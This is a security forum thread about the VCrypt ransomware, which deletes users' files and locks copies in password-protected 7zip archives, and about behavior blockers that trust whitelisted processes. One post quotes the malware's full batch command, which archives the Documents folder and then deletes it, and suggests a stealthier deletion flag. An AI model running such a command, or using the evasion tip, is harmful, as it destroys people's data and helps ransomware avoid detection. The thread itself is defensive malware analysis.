New VCrypt Ransomware locks files in password-protected 7ZIPs

CyberTech

Level 33
Verified
Nov 10, 2017
2,214
A new ransomware called VCrypt is targeting French victims by utilizing the legitimate 7zip command-line program to create password-protected archives of data folders.

BleepingComputer was told today about a new ransomware that was deleting all of a victim's files found in Windows data folders and then creating new "encrypted" files named after the folder name.

These encrypted files would utilize a naming format of username_foldername.vxcrypt.

For example, the files in the Documents folder would be deleted, and a file named User_documents.vcrypt would be created, as shown in the image below.
 

MacDefender

Level 14
Verified
Oct 13, 2019
630
Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.

I sincerely hope that this evolved organically and our attempts to demonstrate a common behavior blocker weakness did not inspire real malware writers.

Unfortunately very very few AVs correctly identify this kind of an attack because most behavior blockers just look at the offending process (7zip in this case) and consider it trusted/whitelisted, as opposed to the whole chain of events that led to 7zip being started, or what exactly 7zip was told to do.
 

MacDefender

Level 14
Verified
Oct 13, 2019
630
FWIW, luckily, this ransomware is very poorly and dumbly coded:

Code:
2480 - C:\Windows\system32\cmd.exe /c if exist %USERPROFILE%\Documents\ for /F %i in (dir /b "%USERPROFILE%\\Documents\\*.*") do %TEMP%\mod_01.exe a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS %USERPROFILE%\%username%_documents.vcrypt %USERPROFILE%\Documents\* & del /f /s /q %USERPROFILE%\Documents\ & FOR /D %p IN (%USERPROFILE%\Documents\*) do rmdir %p /s /q

It uses a batch file and the del command to delete the documents. If they wanted to be smart, they'd use the "-sdel" argument to 7za. Attempting to directly delete the user's documents without abusing a whitelisted process triggers most behavior blockers that are able to AMSI inspect batch files.
 
Last edited:

SeriousHoax

Level 35
Verified
Mar 16, 2019
2,334
Tbh, looks like detecting this ransomware shouldn't even require a trigger from a behavior blocker because AVs with good signatures and heuristics should be able to detect it easily without any additional help. Eg: ESET's detection of this malware as "A Variant Of Win32/Filecoder.NTG".
 

geminis3

Level 18
Verified
Malware Tester
Sep 10, 2015
833
Last edited:

struppigel

Moderator
Verified
Staff member
Apr 9, 2020
297
Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.

Who said it is unrealistic? Zip abusing ransomware has been around for years, before those PoCs.

also written in C 🤔
EDIT: looks like a cybercriminal recreated my PoC and removed the need for a local 7zip copy

The main code is a batch script.
 

MacDefender

Level 14
Verified
Oct 13, 2019
630
Who said it is unrealistic? Zip abusing ransomware has been around for years, before those PoCs.

I believe it was ESET or maybe another vendor. Basically they brushed off the proof of concept as not realistic because users archive their files using 7Zip too, or something along those lines. Either way it was a fairly dismissive analysis of a real problem I was trying to demonstrate, which is a lot of behavior blockers turn a blind eye if you have a trusted process be the last agent to modify and delete your documents.
 

miguelang611

Level 2
Apr 13, 2020
72
Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.

I sincerely hope that this evolved organically and our attempts to demonstrate a common behavior blocker weakness did not inspire real malware writers.

Unfortunately very very few AVs correctly identify this kind of an attack because most behavior blockers just look at the offending process (7zip in this case) and consider it trusted/whitelisted, as opposed to the whole chain of events that led to 7zip being started, or what exactly 7zip was told to do.
As an idea, maybe for people with AVs that can have different levels of restriction (Kaspersky has it, I guess other AVs also), making 7z to allow just 1 folder access, like downloads folder. Then would just encrypt that folder in case of attack o_O

Might not be perfect, but I guess it would make the job :unsure:
 
Top